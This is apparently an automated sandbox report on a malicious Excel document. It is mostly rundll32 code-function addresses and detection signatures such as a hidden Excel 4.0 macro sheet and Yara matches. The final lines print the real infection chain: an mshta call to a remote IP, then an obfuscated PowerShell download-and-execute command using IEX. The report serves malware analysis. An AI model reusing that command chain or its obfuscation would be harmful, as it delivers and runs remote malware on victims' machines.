Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00289BCF 11_2_00289BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272BD9 11_2_00272BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277C37 11_2_00277C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AC3A 11_2_0028AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00273C3C 11_2_00273C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290C14 11_2_00290C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00286C49 11_2_00286C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274C5D 11_2_00274C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DCF7 11_2_0028DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00285CC4 11_2_00285CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00276D24 11_2_00276D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00286DF8 11_2_00286DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279DCF 11_2_00279DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00287DD5 11_2_00287DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028BE27 11_2_0028BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290E3A 11_2_00290E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00273E3F 11_2_00273E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AE6D 11_2_0028AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275E60 11_2_00275E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280E53 11_2_00280E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027EE81 11_2_0027EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00289EEC 11_2_00289EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274EE3 11_2_00274EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027AEFB 11_2_0027AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DEDC 11_2_0028DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290F33 11_2_00290F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027CF47 11_2_0027CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027DFF3 11_2_0027DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277FF2 11_2_00277FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189011 12_2_00189011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183C3C 12_2_00183C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019044F 12_2_0019044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001920BA 12_2_001920BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018D6D8 12_2_0018D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F8FD 12_2_0018F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194116 12_2_00194116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019473C 12_2_0019473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AB87 12_2_0018AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A13AD 12_2_001A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001995FA 12_2_001995FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187FF2 12_2_00187FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001859F2 12_2_001859F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184816 12_2_00184816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0C14 12_2_001A0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190001 12_2_00190001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198606 12_2_00198606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0E3A 12_2_001A0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AC3A 12_2_0019AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183E3F 12_2_00183E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C631 12_2_0019C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AA30 12_2_0019AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019F435 12_2_0019F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187C37 12_2_00187C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BE27 12_2_0019BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184C5D 12_2_00184C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182051 12_2_00182051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182251 12_2_00182251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190E53 12_2_00190E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0056 12_2_001A0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00181A56 12_2_00181A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196C49 12_2_00196C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019907F 12_2_0019907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AE6D 12_2_0019AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185E60 12_2_00185E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A666 12_2_0019A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EA99 12_2_0018EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F09B 12_2_0018F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00191889 12_2_00191889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EE81 12_2_0018EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001870B3 12_2_001870B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DEDC 12_2_0019DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001966CA 12_2_001966CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E2CC 12_2_0018E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00195CC4 12_2_00195CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B2C7 12_2_0018B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AEFB 12_2_0018AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DCF7 12_2_0019DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A2E8 12_2_0019A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199EEC 12_2_00199EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001864E2 12_2_001864E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184EE3 12_2_00184EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198519 12_2_00198519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190B19 12_2_00190B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189714 12_2_00189714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188B3D 12_2_00188B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0F33 12_2_001A0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187735 12_2_00187735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BB23 12_2_0019BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00186D24 12_2_00186D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019CB5B 12_2_0019CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018A55F 12_2_0018A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00192550 12_2_00192550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185548 12_2_00185548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019894B 12_2_0019894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B74D 12_2_0018B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184346 12_2_00184346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018CF47 12_2_0018CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018BB7E 12_2_0018BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188969 12_2_00188969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019176B 12_2_0019176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185361 12_2_00185361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E991 12_2_0018E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019E395 12_2_0019E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019D389 12_2_0019D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189B83 12_2_00189B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194B87 12_2_00194B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001851BB 12_2_001851BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A09B5 12_2_001A09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001881B7 12_2_001881B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C3A0 12_2_0019C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197BA6 12_2_00197BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182BD9 12_2_00182BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197DD5 12_2_00197DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199BCF 12_2_00199BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189DCF 12_2_00189DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E5CF 12_2_0018E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196DF8 12_2_00196DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018DFF3 12_2_0018DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DBEA 12_2_0019DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198BE3 12_2_00198BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025F8FD 14_2_0025F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025AB87 14_2_0025AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E991 14_2_0025E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026BE27 14_2_0026BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257C37 14_2_00257C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026F435 14_2_0026F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AA30 14_2_0026AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C631 14_2_0026C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00253C3C 14_2_00253C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00253E3F 14_2_00253E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AC3A 14_2_0026AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270E3A 14_2_00270E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268606 14_2_00268606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260001 14_2_00260001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270C14 14_2_00270C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254816 14_2_00254816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259011 14_2_00259011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026A666 14_2_0026A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255E60 14_2_00255E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AE6D 14_2_0026AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026907F 14_2_0026907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026044F 14_2_0026044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00266C49 14_2_00266C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270056 14_2_00270056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00251A56 14_2_00251A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252051 14_2_00252051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252251 14_2_00252251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260E53 14_2_00260E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254C5D 14_2_00254C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002570B3 14_2_002570B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002620BA 14_2_002620BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025EE81 14_2_0025EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00261889 14_2_00261889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025EA99 14_2_0025EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025F09B 14_2_0025F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254EE3 14_2_00254EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002564E2 14_2_002564E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00269EEC 14_2_00269EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026A2E8 14_2_0026A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DCF7 14_2_0026DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025AEFB 14_2_0025AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025B2C7 14_2_0025B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00265CC4 14_2_00265CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E2CC 14_2_0025E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002666CA 14_2_002666CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DEDC 14_2_0026DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025D6D8 14_2_0025D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00256D24 14_2_00256D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026BB23 14_2_0026BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257735 14_2_00257735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270F33 14_2_00270F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00258B3D 14_2_00258B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026473C 14_2_0026473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264116 14_2_00264116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259714 14_2_00259714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268519 14_2_00268519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260B19 14_2_00260B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255361 14_2_00255361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00258969 14_2_00258969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026176B 14_2_0026176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025BB7E 14_2_0025BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025CF47 14_2_0025CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254346 14_2_00254346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025B74D 14_2_0025B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255548 14_2_00255548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026894B 14_2_0026894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00262550 14_2_00262550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025A55F 14_2_0025A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026CB5B 14_2_0026CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00267BA6 14_2_00267BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C3A0 14_2_0026C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002713AD 14_2_002713AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002709B5 14_2_002709B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002581B7 14_2_002581B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002551BB 14_2_002551BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264B87 14_2_00264B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259B83 14_2_00259B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026D389 14_2_0026D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026E395 14_2_0026E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268BE3 14_2_00268BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DBEA 14_2_0026DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025DFF3 14_2_0025DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257FF2 14_2_00257FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002559F2 14_2_002559F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002695FA 14_2_002695FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00266DF8 14_2_00266DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00269BCF 14_2_00269BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259DCF 14_2_00259DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E5CF 14_2_0025E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00267DD5 14_2_00267DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252BD9 14_2_00252BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00223C3C 15_2_00223C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00229011 15_2_00229011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0023044F 15_2_0023044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002320BA 15_2_002320BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022F8FD 15_2_0022F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022D6D8 15_2_0022D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0023473C 15_2_0023473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00234116 15_2_00234116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002413AD 15_2_002413AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022AB87 15_2_0022AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00227FF2 15_2_00227FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002259F2 15_2_002259F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002395FA 15_2_002395FA
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 32E3.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: 2022-28-01_1202.xls Macro extractor: Sheet name: REEEEEEEE
Source: 2022-28-01_1202.xls Macro extractor: Sheet name: REEEEEEEE
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\JooSee.dll 21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E249 DeleteService, 12_2_0018E249
Yara signature match
Source: 2022-28-01_1202.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: 2022-28-01_1202.xls OLE indicator, VBA macros: true
Source: 2022-28-01_1202.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: 2022-28-01_1202.xls OLE indicator, Workbook stream: true
Source: 2022-28-01_1202.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 2022-28-01_1202.xls ReversingLabs: Detection: 11%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K......h.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................DX.k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................DX.k..... ..............................}..v............0...............h.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................$X.k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................$X.k....H.^.............................}..v....h.......0.................^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............tY.k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............tY.k......^.............................}..v............0...............x.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................A.k....E...............................}..v............0...............H.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+................A.k....E...............................}..v....@.......0...............H.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............X.......:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
